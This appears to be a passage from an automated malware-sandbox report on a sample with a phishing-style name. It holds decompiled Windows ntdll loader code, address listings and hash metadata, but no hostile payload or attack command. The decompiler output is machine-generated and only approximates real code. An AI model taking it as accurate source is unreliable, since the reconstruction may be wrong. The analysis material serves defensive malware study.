				if(E33378BD1(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E33378BD1(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E33378BD1(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t71 = _v12 + 4; // 0x6
						_t255 = _t71;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L33365D90(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E333988C0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E3339A8B0(_t276, ";");
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E33395050(0,  &_v68, _t170);
									_t86 =  &_v24; // 0x33372e68
									if(E333756E0( &_v68, _t86) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E33395050(_t257,  &_v68, _t243);
								_t80 =  &_v24; // 0x33372e68
								if(E333756E0( &_v68, _t80) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E3339A8B0(_t278, ";");
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t48 = _v12 + 4; // 0x6
					_t260 = _t48;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L33365D90(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E333988C0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E3339A8B0(_v16, ";");
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E33395050(_t262,  &_v68, _t244);
								_t125 =  &_v24; // 0x33372e68
								if(E333756E0( &_v68, _t125) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E3339A8B0(_t282, ";");
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E33395050(_t262,  &_v68, _t201);
							_t58 =  &_v24; // 0x33372e68
							if(E333756E0( &_v68, _t58) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t26 = _v12 + 4; // 0x6
				_t264 = _t26;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L33365D90(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E333988C0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E3339A8B0(_t280, ";");
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E33395050(_t267,  &_v68, _t245);
							_t117 =  &_v24; // 0x33372e68
							if(E333756E0( &_v68, _t117) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E3339A8B0(_t284, ";");
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E33395050(_t267,  &_v68, _t224);
						_t35 =  &_v24; // 0x33372e68
						if(E333756E0( &_v68, _t35) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                                                                                                                  0x33375117
                                                                                                                                                                                  0x3337511d
                                                                                                                                                                                  0x3337511f
                                                                                                                                                                                  0x33375121
                                                                                                                                                                                  0x33375124
                                                                                                                                                                                  0x33375127
                                                                                                                                                                                  0x3337512a
                                                                                                                                                                                  0x3337512d
                                                                                                                                                                                  0x33375130
                                                                                                                                                                                  0x33375133
                                                                                                                                                                                  0x33375136
                                                                                                                                                                                  0x3337513a
                                                                                                                                                                                  0x3337513c
                                                                                                                                                                                  0x33375141
                                                                                                                                                                                  0x333bb9ab
                                                                                                                                                                                  0x333bb9b0
                                                                                                                                                                                  0x33375460
                                                                                                                                                                                  0x33375463
                                                                                                                                                                                  0x33375469
                                                                                                                                                                                  0x3337546f
                                                                                                                                                                                  0x33375475
                                                                                                                                                                                  0x3337547b
                                                                                                                                                                                  0x33375481
                                                                                                                                                                                  0x33375484
                                                                                                                                                                                  0x3337548a
                                                                                                                                                                                  0x33375491
                                                                                                                                                                                  0x33375496
                                                                                                                                                                                  0x33375496
                                                                                                                                                                                  0x3337515e
                                                                                                                                                                                  0x333bb9b7
                                                                                                                                                                                  0x333bb9c1
                                                                                                                                                                                  0x333bb9d0
                                                                                                                                                                                  0x333bb9d0
                                                                                                                                                                                  0x333bb9d5
                                                                                                                                                                                  0x333bb9d5
                                                                                                                                                                                  0x3337517b
                                                                                                                                                                                  0x3337518a
                                                                                                                                                                                  0x33375190
                                                                                                                                                                                  0x33375195
                                                                                                                                                                                  0x33375195
                                                                                                                                                                                  0x333751af
                                                                                                                                                                                  0x3337526f
                                                                                                                                                                                  0x33375286
                                                                                                                                                                                  0x33375348
                                                                                                                                                                                  0x3337535f
                                                                                                                                                                                  0x33375446
                                                                                                                                                                                  0x33375446
                                                                                                                                                                                  0x33375449
                                                                                                                                                                                  0x33375449
                                                                                                                                                                                  0x3337544b
                                                                                                                                                                                  0x3337544f
                                                                                                                                                                                  0x333bbae9
                                                                                                                                                                                  0x333bbae9
                                                                                                                                                                                  0x33375455
                                                                                                                                                                                  0x3337545a
                                                                                                                                                                                  0x333bbaf5
                                                                                                                                                                                  0x333bbb08
                                                                                                                                                                                  0x333bbb0f
                                                                                                                                                                                  0x333bbb11
                                                                                                                                                                                  0x333bbb14
                                                                                                                                                                                  0x333bbb14
                                                                                                                                                                                  0x333bbaf5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337545a
                                                                                                                                                                                  0x33375368
                                                                                                                                                                                  0x33375368
                                                                                                                                                                                  0x3337536b
                                                                                                                                                                                  0x33375370
                                                                                                                                                                                  0x333bbaa5
                                                                                                                                                                                  0x333bbaa7
                                                                                                                                                                                  0x33375376
                                                                                                                                                                                  0x33375387
                                                                                                                                                                                  0x33375389
                                                                                                                                                                                  0x3337538c
                                                                                                                                                                                  0x3337538c
                                                                                                                                                                                  0x33375391
                                                                                                                                                                                  0x333bbaaf
                                                                                                                                                                                  0x333bbab2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33375397
                                                                                                                                                                                  0x3337539c
                                                                                                                                                                                  0x333753a4
                                                                                                                                                                                  0x333753b2
                                                                                                                                                                                  0x333753b5
                                                                                                                                                                                  0x333753b8
                                                                                                                                                                                  0x333753fc
                                                                                                                                                                                  0x333753fc
                                                                                                                                                                                  0x33375404
                                                                                                                                                                                  0x3337540b
                                                                                                                                                                                  0x33375410
                                                                                                                                                                                  0x3337541f
                                                                                                                                                                                  0x33375421
                                                                                                                                                                                  0x33375421
                                                                                                                                                                                  0x3337541f
                                                                                                                                                                                  0x33375424
                                                                                                                                                                                  0x333bbabf
                                                                                                                                                                                  0x333bbacc
                                                                                                                                                                                  0x333bbad1
                                                                                                                                                                                  0x333bbad4
                                                                                                                                                                                  0x3337542a
                                                                                                                                                                                  0x3337542a
                                                                                                                                                                                  0x3337542a
                                                                                                                                                                                  0x3337542c
                                                                                                                                                                                  0x33375431
                                                                                                                                                                                  0x3337543e
                                                                                                                                                                                  0x3337543e
                                                                                                                                                                                  0x33375443
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33375443
                                                                                                                                                                                  0x333753ba
                                                                                                                                                                                  0x333753bd
                                                                                                                                                                                  0x333753bf
                                                                                                                                                                                  0x333753c2
                                                                                                                                                                                  0x333753ca
                                                                                                                                                                                  0x333753cf
                                                                                                                                                                                  0x333753de
                                                                                                                                                                                  0x333753e0
                                                                                                                                                                                  0x333753e0
                                                                                                                                                                                  0x333753e7
                                                                                                                                                                                  0x333753ee
                                                                                                                                                                                  0x333753f1
                                                                                                                                                                                  0x333753f2
                                                                                                                                                                                  0x333753f6
                                                                                                                                                                                  0x333753f9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333753f9
                                                                                                                                                                                  0x33375391
                                                                                                                                                                                  0x3337528f
                                                                                                                                                                                  0x3337528f
                                                                                                                                                                                  0x33375292
                                                                                                                                                                                  0x33375297
                                                                                                                                                                                  0x333bba41
                                                                                                                                                                                  0x333bba43
                                                                                                                                                                                  0x3337529d
                                                                                                                                                                                  0x333752ae
                                                                                                                                                                                  0x333752b0
                                                                                                                                                                                  0x333752b3
                                                                                                                                                                                  0x333752b3
                                                                                                                                                                                  0x333752b8
                                                                                                                                                                                  0x333bba4b
                                                                                                                                                                                  0x333bba4e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333752be
                                                                                                                                                                                  0x333752c3
                                                                                                                                                                                  0x333752c8
                                                                                                                                                                                  0x333752cb
                                                                                                                                                                                  0x333752ce
                                                                                                                                                                                  0x333752dd
                                                                                                                                                                                  0x333752e0
                                                                                                                                                                                  0x333752e3
                                                                                                                                                                                  0x333bba58
                                                                                                                                                                                  0x333bba5b
                                                                                                                                                                                  0x333bba5d
                                                                                                                                                                                  0x333bba60
                                                                                                                                                                                  0x333bba68
                                                                                                                                                                                  0x333bba6d
                                                                                                                                                                                  0x333bba7c
                                                                                                                                                                                  0x333bba7e
                                                                                                                                                                                  0x333bba7e
                                                                                                                                                                                  0x333bba85
                                                                                                                                                                                  0x333bba8c
                                                                                                                                                                                  0x333bba8f
                                                                                                                                                                                  0x333bba90
                                                                                                                                                                                  0x333bba94
                                                                                                                                                                                  0x333bba97
                                                                                                                                                                                  0x333bba97
                                                                                                                                                                                  0x333752e9
                                                                                                                                                                                  0x333752ec
                                                                                                                                                                                  0x333752f1
                                                                                                                                                                                  0x333752f8
                                                                                                                                                                                  0x333752fd
                                                                                                                                                                                  0x3337530c
                                                                                                                                                                                  0x333bba9f
                                                                                                                                                                                  0x333bba9f
                                                                                                                                                                                  0x3337530c
                                                                                                                                                                                  0x33375314
                                                                                                                                                                                  0x33375323
                                                                                                                                                                                  0x33375328
                                                                                                                                                                                  0x3337532b
                                                                                                                                                                                  0x3337532b
                                                                                                                                                                                  0x3337532e
                                                                                                                                                                                  0x33375333
                                                                                                                                                                                  0x33375340
                                                                                                                                                                                  0x33375340
                                                                                                                                                                                  0x33375345
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33375345
                                                                                                                                                                                  0x333752b8
                                                                                                                                                                                  0x333751b8
                                                                                                                                                                                  0x333751b8
                                                                                                                                                                                  0x333751bb
                                                                                                                                                                                  0x333751c0
                                                                                                                                                                                  0x333bb9dd
                                                                                                                                                                                  0x333751c6
                                                                                                                                                                                  0x333751d2
                                                                                                                                                                                  0x333751d7
                                                                                                                                                                                  0x333751d9
                                                                                                                                                                                  0x333751dc
                                                                                                                                                                                  0x333751dc
                                                                                                                                                                                  0x333751e1
                                                                                                                                                                                  0x333bb9e5
                                                                                                                                                                                  0x333bb9e7
                                                                                                                                                                                  0x333bb9ec
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333751e7
                                                                                                                                                                                  0x333751ec
                                                                                                                                                                                  0x333751f1
                                                                                                                                                                                  0x333751f4
                                                                                                                                                                                  0x33375204
                                                                                                                                                                                  0x33375207
                                                                                                                                                                                  0x3337520a
                                                                                                                                                                                  0x333bb9f4
                                                                                                                                                                                  0x333bb9f7
                                                                                                                                                                                  0x333bb9f9
                                                                                                                                                                                  0x333bb9fc
                                                                                                                                                                                  0x333bba04
                                                                                                                                                                                  0x333bba09
                                                                                                                                                                                  0x333bba18
                                                                                                                                                                                  0x333bba1a
                                                                                                                                                                                  0x333bba1a
                                                                                                                                                                                  0x333bba21
                                                                                                                                                                                  0x333bba28
                                                                                                                                                                                  0x333bba2b
                                                                                                                                                                                  0x333bba2c
                                                                                                                                                                                  0x333bba30
                                                                                                                                                                                  0x333bba33
                                                                                                                                                                                  0x333bba33
                                                                                                                                                                                  0x33375210
                                                                                                                                                                                  0x33375213
                                                                                                                                                                                  0x33375218
                                                                                                                                                                                  0x3337521f
                                                                                                                                                                                  0x33375224
                                                                                                                                                                                  0x33375233
                                                                                                                                                                                  0x333bba3b
                                                                                                                                                                                  0x333bba3b
                                                                                                                                                                                  0x33375233
                                                                                                                                                                                  0x3337523b
                                                                                                                                                                                  0x3337524a
                                                                                                                                                                                  0x3337524f
                                                                                                                                                                                  0x33375252
                                                                                                                                                                                  0x33375252
                                                                                                                                                                                  0x33375255
                                                                                                                                                                                  0x3337525a
                                                                                                                                                                                  0x33375267
                                                                                                                                                                                  0x33375267
                                                                                                                                                                                  0x3337526c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3337526c

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.73
                                                                                                                                                                                  • API String ID: 0-2847985860
                                                                                                                                                                                  • Opcode ID: 0e7ff552612c474cefa87179238861cbf55b00723469600887267c162aff20ff
                                                                                                                                                                                  • Instruction ID: a2d8276dad594d531a760fffb8ce60fb954b54b787b95dc345bb58803f1e26b1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e7ff552612c474cefa87179238861cbf55b00723469600887267c162aff20ff
                                                                                                                                                                                  • Instruction Fuzzy Hash: BDF15DB6D41219EFEB15CF99C980ADEBBBCFF48650F14806AE501E7610DB749E01CBA0
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3336B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMONCrypto
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                                                  			E3336B0D0(signed short* __ecx, signed short* __edx, signed int _a4, signed int* _a8) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed short* _v12;
				char _v16;
				signed int _v20;
				char _v28;
				char _v36;
				char _v44;
				signed int _t75;
				char* _t76;
				signed int _t79;
				signed short* _t81;
				signed short* _t89;
				short* _t93;
				signed short* _t96;
				signed int _t97;
				signed int _t103;
				signed int _t112;
				void* _t119;
				char _t128;
				signed int _t134;
				signed short* _t135;
				signed int _t136;
				signed int* _t138;
				signed int _t140;
				signed short _t141;
				void* _t144;
				signed short _t145;
				signed int _t146;
				signed int _t151;
				signed short* _t161;
				signed short _t165;
				signed short _t168;
				signed short* _t183;
				signed int _t184;
				signed int _t186;
				void* _t189;

				_t135 = __ecx;
				_t183 = __edx;
				_v12 = __ecx;
				if(E3336C4A0(0,  &_v16) < 0) {
					_v8 = 0;
				} else {
					_v8 = 1;
				}
				_t138 = _a8;
				_t75 = 0;
				_t184 = 0;
				_v5 = 0;
				if(( *_t138 & 0x00800008) != 0) {
					L16:
					_v12 = _t135;
					if( *_t183 != 0) {
						__eflags =  *0x334437c0 & 0x00000005;
						if(( *0x334437c0 & 0x00000005) != 0) {
							__eflags = _t75;
							_t76 = "SxS";
							if(_t75 == 0) {
								_t76 = "API set";
							}
							_push(_t76);
							_push(_t183);
							E333CE692("minkernel\\ntdll\\ldrutil.c", 0xa78, "LdrpPreprocessDllName", 2, "DLL %wZ was redirected to %wZ by %s\n", _t135);
							_t138 = _a8;
							_t189 = _t189 + 0x20;
						}
						_t79 =  *_t138 | 0x00000200;
						__eflags = _v5;
						 *_t138 = _t79;
						if(_v5 != 0) {
							 *_t138 = _t79 | 0x00000004;
						}
						_t81 = _t183;
						_v12 = _t81;
						L27:
						if(_t184 < 0) {
							goto L83;
						}
						if(( *_t138 & 0x00000200) != 0) {
							L3335FCF0(_t138, _t183);
							_t81 = _v12;
						}
						_t165 = _t81[2];
						_t89 = ( *_t81 & 0x0000ffff) + 0xfffffffe + _t165;
						if(_t89 < _t165) {
							L34:
							_t184 = E3336C7E7(_t183, 0x3332116c);
							goto L39;
						} else {
							while(1) {
								_t140 =  *_t89 & 0x0000ffff;
								if(_t140 == 0x2e) {
									break;
								}
								if(_t140 != 0x2f && _t140 != 0x5c) {
									_t89 = _t89 - 2;
									if(_t89 >= _t165) {
										continue;
									}
								}
								goto L34;
							}
							_t141 = _t183[2];
							_t93 = ( *_t183 & 0x0000ffff) + 0xfffffffe + _t141;
							__eflags = _t93 - _t141;
							if(_t93 < _t141) {
								L38:
								__eflags = 0;
								 *((short*)(_t93 + 2)) = 0;
								L39:
								if(_t184 < 0) {
									goto L83;
								}
								goto L40;
							}
							while(1) {
								__eflags =  *_t93 - 0x2e;
								if( *_t93 != 0x2e) {
									goto L38;
								}
								_t93 = _t93 - 2;
								 *_t183 =  *_t183 + 0xfffe;
								__eflags = _t93 - _t141;
								if(_t93 >= _t141) {
									continue;
								}
								goto L38;
							}
							goto L38;
						}
					}
					_t168 = _t135[2];
					_t96 = ( *_t135 & 0x0000ffff) + 0xfffffffe + _t168;
					if(_t96 < _t168) {
						L22:
						 *_t138 =  *_t138 | 0x00000020;
						_t184 = 0;
						_t97 =  *_t135 & 0x0000ffff;
						if(_t97 == 0) {
							L26:
							_t81 = _t135;
							goto L27;
						}
						_t144 = _t97 + ( *_t183 & 0x0000ffff) + 2;
						if(_t144 > (_t183[1] & 0x0000ffff)) {
							__eflags = _t144 - 0xfffe;
							if(_t144 <= 0xfffe) {
								_t62 = _t144 + 0x3f; // -191
								_t186 = _t62 & 0xffffffc0;
								__eflags = _t186 - 0xfffe;
								if(_t186 > 0xfffe) {
									_t186 = 0xfffe;
								}
								_t145 = _t183[2];
								_t64 =  &(_t183[4]); // 0x1000008
								__eflags = _t145 - _t64;
								if(_t145 == _t64) {
									_t146 = E33365D60(_t186);
									_v20 = _t146;
									__eflags = _t146;
									if(_t146 == 0) {
										goto L80;
									}
									_t103 =  *_t183 & 0x0000ffff;
									__eflags = _t103;
									if(_t103 != 0) {
										E333988C0(_t146, _t183[2], _t103);
										_t146 = _v20;
										_t189 = _t189 + 0xc;
									}
									goto L78;
								} else {
									_t146 = L333D3C57(_t186, _t145);
									L78:
									__eflags = _t146;
									if(_t146 == 0) {
										L80:
										_t184 = 0xc0000017;
										L25:
										_t138 = _a8;
										goto L26;
									}
									_t183[2] = _t146;
									_t183[1] = _t186;
									goto L24;
								}
							}
							_t184 = 0xc0000106;
							goto L25;
						}
						L24:
						_t184 = 0;
						E333988C0(( *_t183 & 0x0000ffff) + _t183[2], _t135[2],  *_t135 & 0x0000ffff);
						_t189 = _t189 + 0xc;
						 *_t183 =  *_t183 + ( *_t135 & 0x0000ffff);
						 *((short*)(_t183[2] + (( *_t183 & 0x0000ffff) >> 1) * 2)) = 0;
						goto L25;
					} else {
						goto L18;
					}
					while(1) {
						L18:
						_t151 =  *_t96 & 0x0000ffff;
						if(_t151 == 0x5c || _t151 == 0x2f) {
							break;
						}
						_t96 = _t96 - 2;
						if(_t96 >= _t168) {
							continue;
						}
						_t138 = _a8;
						goto L22;
					}
					__eflags = L3338432E(_t135) - 5;
					if(__eflags == 0) {
						_t184 = E3336C7E7(_t183, _t135);
						goto L25;
					}
					_t112 = E333723C4(_t135, _t183, __eflags);
					_t138 = _a8;
					_t184 = _t112;
					_t81 = _t135;
					__eflags = _t184;
					if(_t184 < 0) {
						goto L83;
					}
					 *_t138 =  *_t138 | 0x00000600;
					goto L27;
				} else {
					_v5 = 0;
					_v20 =  *[fs:0x30];
					_v7 = 1;
					E3336DF36(0, _t135, 0x14d0);
					asm("sbb edx, edx");
					if(E3337015C( *((intOrPtr*)( *[fs:0x30] + 0x38)), _t135,  ~_a4 & _a4 + 0x0000002c,  &_v6,  &_v28) < 0 || _v6 == 0) {
						_t119 = 0x14d3;
					} else {
						__eflags = _v28;
						if(_v28 == 0) {
							_t119 = 0x14d2;
						} else {
							_t119 = 0x14d1;
						}
					}
					E3336DF36(0, _t135, _t119);
					if(_v6 != 0) {
						__eflags = _v28;
						if(_v28 == 0) {
							_t184 = 0xc0000481;
							goto L14;
						}
						 *_t183 = 0;
						E33395050(0,  &_v44, E333601C0());
						E3336C7E7(_t183,  &_v44);
						E3336C7E7(_t183, 0x33321008);
						_t184 = E3336C7E7(_t183,  &_v28);
						__eflags = _t184;
						if(_t184 < 0) {
							goto L7;
						}
						_t134 =  *(_v20 + 0x10);
						__eflags = _t134;
						if(_t134 == 0) {
							L53:
							_t128 = 0;
							__eflags = 0;
							L54:
							_t161 = _t183;
							goto L8;
						}
						__eflags =  *(_t134 + 8) & 0x00001000;
						if(( *(_t134 + 8) & 0x00001000) != 0) {
							_t128 = 1;
							goto L54;
						}
						goto L53;
					} else {
						L7:
						_t128 = _v7;
						_t161 = _t135;
						L8:
						if(_t184 < 0) {
							L83:
							__eflags =  *0x334437c0 & 0x00000003;
							if(( *0x334437c0 & 0x00000003) != 0) {
								_push(_t184);
								E333CE692("minkernel\\ntdll\\ldrutil.c", 0xab2, "LdrpPreprocessDllName", 0, "LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx\n", _t135);
							}
							__eflags =  *0x334437c0 & 0x00000010;
							if(( *0x334437c0 & 0x00000010) != 0) {
								asm("int3");
							}
							L40:
							if(_v8 != 0) {
								E3336C4A0(_v16,  &_v16);
							}
							return _t184;
						} else {
							if(_t128 != 0 &&  *0x33445d70 == 0) {
								_t136 = E33369870("true", _t161, 0x3332116c, 0,  &_v36, 0, 0, 0, 0);
								if(_t136 >= 0) {
									_v5 = 1;
									E333723C4( &_v36, _t183, __eflags);
									E3337E3C9( &_v36);
								}
								if(_t136 != 0xc0150008) {
									_t184 = _t136;
								}
								_t135 = _v12;
							}
							L14:
							if(_t184 < 0) {
								goto L83;
							} else {
								_t138 = _a8;
								_t75 = _v5;
								goto L16;
							}
						}
					}
				}
			}










































                                                                                                                                                                                  0x3336b0de
                                                                                                                                                                                  0x3336b0e3
                                                                                                                                                                                  0x3336b0e5
                                                                                                                                                                                  0x3336b0ef
                                                                                                                                                                                  0x333b81db
                                                                                                                                                                                  0x3336b0f5
                                                                                                                                                                                  0x3336b0f5
                                                                                                                                                                                  0x3336b0f5
                                                                                                                                                                                  0x3336b0f9
                                                                                                                                                                                  0x3336b0fc
                                                                                                                                                                                  0x3336b0fe
                                                                                                                                                                                  0x3336b100
                                                                                                                                                                                  0x3336b109
                                                                                                                                                                                  0x3336b1d5
                                                                                                                                                                                  0x3336b1d9
                                                                                                                                                                                  0x3336b1dc
                                                                                                                                                                                  0x3336b303
                                                                                                                                                                                  0x3336b30a
                                                                                                                                                                                  0x333b81f8
                                                                                                                                                                                  0x333b81fa
                                                                                                                                                                                  0x333b81ff
                                                                                                                                                                                  0x333b8201
                                                                                                                                                                                  0x333b8201
                                                                                                                                                                                  0x333b8206
                                                                                                                                                                                  0x333b8207
                                                                                                                                                                                  0x333b821f
                                                                                                                                                                                  0x333b8224
                                                                                                                                                                                  0x333b8227
                                                                                                                                                                                  0x333b8227
                                                                                                                                                                                  0x3336b312
                                                                                                                                                                                  0x3336b317
                                                                                                                                                                                  0x3336b31b
                                                                                                                                                                                  0x3336b31d
                                                                                                                                                                                  0x3336b3ff
                                                                                                                                                                                  0x3336b3ff
                                                                                                                                                                                  0x3336b323
                                                                                                                                                                                  0x3336b325
                                                                                                                                                                                  0x3336b264
                                                                                                                                                                                  0x3336b266
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b272
                                                                                                                                                                                  0x3336b2f6
                                                                                                                                                                                  0x3336b2fb
                                                                                                                                                                                  0x3336b2fb
                                                                                                                                                                                  0x3336b278
                                                                                                                                                                                  0x3336b281
                                                                                                                                                                                  0x3336b285
                                                                                                                                                                                  0x3336b2a0
                                                                                                                                                                                  0x3336b2ac
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b287
                                                                                                                                                                                  0x3336b287
                                                                                                                                                                                  0x3336b287
                                                                                                                                                                                  0x3336b28d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b292
                                                                                                                                                                                  0x3336b299
                                                                                                                                                                                  0x3336b29e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b29e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b292
                                                                                                                                                                                  0x3336b2b3
                                                                                                                                                                                  0x3336b2b9
                                                                                                                                                                                  0x3336b2bb
                                                                                                                                                                                  0x3336b2bd
                                                                                                                                                                                  0x3336b2ca
                                                                                                                                                                                  0x3336b2ca
                                                                                                                                                                                  0x3336b2cc
                                                                                                                                                                                  0x3336b2d0
                                                                                                                                                                                  0x3336b2d2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b2d2
                                                                                                                                                                                  0x3336b2c0
                                                                                                                                                                                  0x3336b2c0
                                                                                                                                                                                  0x3336b2c4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b82bf
                                                                                                                                                                                  0x333b82c2
                                                                                                                                                                                  0x333b82c5
                                                                                                                                                                                  0x333b82c7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b82cd
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b2c0
                                                                                                                                                                                  0x3336b285
                                                                                                                                                                                  0x3336b1e5
                                                                                                                                                                                  0x3336b1eb
                                                                                                                                                                                  0x3336b1ef
                                                                                                                                                                                  0x3336b210
                                                                                                                                                                                  0x3336b210
                                                                                                                                                                                  0x3336b213
                                                                                                                                                                                  0x3336b215
                                                                                                                                                                                  0x3336b21b
                                                                                                                                                                                  0x3336b262
                                                                                                                                                                                  0x3336b262
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336b262
                                                                                                                                                                                  0x3336b225
                                                                                                                                                                                  0x3336b22d
                                                                                                                                                                                  0x333b823f
                                                                                                                                                                                  0x333b8245
                                                                                                                                                                                  0x333b8251
                                                                                                                                                                                  0x333b8254
                                                                                                                                                                                  0x333b8257
                                                                                                                                                                                  0x333b825d
                                                                                                                                                                                  0x333b825f
                                                                                                                                                                                  0x333b825f
                                                                                                                                                                                  0x333b8264
                                                                                                                                                                                  0x333b8267
                                                                                                                                                                                  0x333b826a
                                                                                                                                                                                  0x333b826c
                                                                                                                                                                                  0x333b827f
                                                                                                                                                                                  0x333b8281
                                                                                                                                                                                  0x333b8284
                                                                                                                                                                                  0x333b8286
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b8288
                                                                                                                                                                                  0x333b828b
                                                                                                                                                                                  0x333b828e
